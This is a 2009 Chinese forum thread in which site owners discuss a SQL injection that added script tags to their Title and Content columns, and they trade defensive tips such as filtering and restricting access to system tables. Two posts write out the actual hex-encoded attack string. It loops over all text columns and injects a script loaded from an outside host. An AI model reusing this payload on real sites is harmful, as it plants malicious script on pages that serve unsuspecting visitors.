62,244
社区成员
发帖
与我相关
我的任务
分享这种sql注入方式是如何做到的
数据库所有表字段为Title和Content的字段被更新加入了<script></script>
表名都是用的比较繁琐的名字
弱弱的问下 难道不知道表名只知道字段名也可以注入吗 他这是使用的什么方式
表名都是用的比较繁琐的名字
弱弱的问下 难道不知道表名只知道字段名也可以注入吗 他这是使用的什么方式
...全文
请发表友善的回复…
发表回复
lk829 2009-09-07
- 打赏
- 举报
[Quote=引用 30 楼 le616 的回复:]
dEcLaRe @s vArChAr(8000) sEt @s=dEcLaRe @s vArChAr(8000) sEt @s=0x4445434c415245204054207661726368617228323535292c404320766172636861722832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420612e6e616d652c622e6e616d652066726f6d207379736f626a6563747320612c737973636f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d27752720616e642028622e78747970653d3939206f7220622e78747970653d3335206f7220622e78747970653d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20657865632827757064617465205b272b40542b275d20736574205b272b40432b275d3d727472696d28636f6e7665727428766172636861722c5b272b40432b275d29292b2727223e3c736372697074207372633d687474703a2f2f383838392e73732e6c613e3c2f7363726970743e272727294645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72 eXeC(@s)
------------
[/Quote]
----------
你发的这种只不过是cookies注入的的数据
dEcLaRe @s vArChAr(8000) sEt @s=dEcLaRe @s vArChAr(8000) sEt @s=0x4445434c415245204054207661726368617228323535292c404320766172636861722832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420612e6e616d652c622e6e616d652066726f6d207379736f626a6563747320612c737973636f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d27752720616e642028622e78747970653d3939206f7220622e78747970653d3335206f7220622e78747970653d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20657865632827757064617465205b272b40542b275d20736574205b272b40432b275d3d727472696d28636f6e7665727428766172636861722c5b272b40432b275d29292b2727223e3c736372697074207372633d687474703a2f2f383838392e73732e6c613e3c2f7363726970743e272727294645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72 eXeC(@s)
------------
[/Quote]
----------
你发的这种只不过是cookies注入的的数据
le616 2009-09-07
- 打赏
- 举报
dEcLaRe @s vArChAr(8000) sEt @s=dEcLaRe @s vArChAr(8000) sEt @s=0x4445434c415245204054207661726368617228323535292c404320766172636861722832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420612e6e616d652c622e6e616d652066726f6d207379736f626a6563747320612c737973636f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d27752720616e642028622e78747970653d3939206f7220622e78747970653d3335206f7220622e78747970653d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20657865632827757064617465205b272b40542b275d20736574205b272b40432b275d3d727472696d28636f6e7665727428766172636861722c5b272b40432b275d29292b2727223e3c736372697074207372633d687474703a2f2f383838392e73732e6c613e3c2f7363726970743e272727294645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72 eXeC(@s)
------------
------------
lk829 2009-09-07
- 打赏
- 举报
其实我最想知道的是这种注入方式是如何实现的
估计不是参数注入这么简单
估计不是参数注入这么简单
大石谭 2009-09-07
- 打赏
- 举报
反正只有有数据输入的地方,都进行检查
当然最好是用存储过程,呵呵,就不用检查
当然最好是用存储过程,呵呵,就不用检查
lk829 2009-09-07
- 打赏
- 举报
[Quote=引用 26 楼 mngzilin 的回复:]
这是利用js操作cookies的自动回发进行注入的。
[/Quote]
========
mngzilin 能否再告知详细点 说明下原理
这是利用js操作cookies的自动回发进行注入的。
[/Quote]
========
mngzilin 能否再告知详细点 说明下原理
mngzilin 2009-09-07
- 打赏
- 举报
这是利用js操作cookies的自动回发进行注入的。
lk829 2009-09-07
- 打赏
- 举报
[Quote=引用 24 楼 sohighthesky 的回复:]
引用 8 楼 lk829 的回复:
问题是前台所有页面参数字符串都进行了参数过滤(正则)
前台过滤了有用么?
前后台一起过滤,
[/Quote]
------------------
在弱弱的问下 后台必须需要权限才能访问页面 怎么来获取登录权限
引用 8 楼 lk829 的回复:
问题是前台所有页面参数字符串都进行了参数过滤(正则)
前台过滤了有用么?
前后台一起过滤,
[/Quote]
------------------
在弱弱的问下 后台必须需要权限才能访问页面 怎么来获取登录权限
sohighthesky 2009-09-05
- 打赏
- 举报
[Quote=引用 8 楼 lk829 的回复:]
问题是前台所有页面参数字符串都进行了参数过滤(正则)
[/Quote]
前台过滤了有用么?
前后台一起过滤,
问题是前台所有页面参数字符串都进行了参数过滤(正则)
[/Quote]
前台过滤了有用么?
前后台一起过滤,
wpfonline 2009-09-05
- 打赏
- 举报
关注中 我们公司的网站也老这样
saidong 2009-09-05
- 打赏
- 举报
从论坛其他贴子找到的,试后管用。
saidong 2009-09-05
- 打赏
- 举报
彻底杜绝SQL注入
1.不要使用sa用户连接数据库
2、新建一个public权限数据库用户,并用这个用户访问数据库
3、[角色]去掉角色public对sysobjects与syscolumns对象的select访问权限
4、[用户]用户名称-> 右键-属性-权限-在sysobjects与syscolumns上面打“×”
5、通过以下代码检测(失败表示权限正确,如能显示出来则表明权限太高):
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype= 'u ' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN print @c
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
---------------------------------------------------------------
1.不要使用sa用户连接数据库
2、新建一个public权限数据库用户,并用这个用户访问数据库
3、[角色]去掉角色public对sysobjects与syscolumns对象的select访问权限
4、[用户]用户名称-> 右键-属性-权限-在sysobjects与syscolumns上面打“×”
5、通过以下代码检测(失败表示权限正确,如能显示出来则表明权限太高):
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype= 'u ' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN print @c
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
---------------------------------------------------------------
lk829 2009-09-05
- 打赏
- 举报
还有大虾赐教下吗
lk829 2009-09-04
- 打赏
- 举报
大家都来关注下
duanjiwei 2009-09-02
- 打赏
- 举报
跟踪
zhang17500332 2009-09-02
- 打赏
- 举报
在请求的地方加过滤 过滤掉这些关键字
lk829 2009-09-02
- 打赏
- 举报
所有表字段为Title和Content的字段被注入 没有的就没有被注入
而且不定期的自动更新注入
我想可能使用的某个工具进行
而且不定期的自动更新注入
我想可能使用的某个工具进行
lk829 2009-09-02
- 打赏
- 举报
问题是前台所有页面参数字符串都进行了参数过滤(正则)
zzxap 2009-09-02
- 打赏
- 举报
将URL加密一下,想在url注入就不那么容易了
阿彪兄 2009-09-02
- 打赏
- 举报
支持一下
沉序员 2009-09-02
- 打赏
- 举报
DD
加载更多回复(10)
